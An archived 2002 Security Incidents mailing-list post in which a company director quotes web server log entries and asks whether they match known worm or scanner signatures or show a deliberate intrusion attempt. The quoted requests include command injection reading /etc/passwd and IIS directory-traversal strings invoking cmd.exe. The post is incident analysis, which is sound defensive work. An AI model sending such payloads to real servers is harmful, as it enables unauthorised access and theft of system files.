Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Security Incidents: A small quandary

A small quandary

From: Mahoney, Paul <paul_at_fiberstarr.com>
Date: Wed, 4 Dec 2002 20:30:08 -0800

Hi all,

I have in my possession a log file that implicates a business
acquaintance, who to say the least, might have the attitude to mount an
offensive.

The log file contains many entries like:-

404

/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output
_number=10
/perl/ 1 -
/cgi-bin/test-cgi.bat?|ver 1 -
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: 1 -
/cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini 1 -
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\\

My question to everyone out there is would anyone be able to tell me if
this kind of attack has the fingerprints of any known software/viruses
in the field or is it a deliberate attempt to gain access to my clients
site?

Your thoughts are welcomed

Paul Mahoney
Director
FiberStarr Systems
www.fiberstarr.com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Received on Dec 06 2002

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos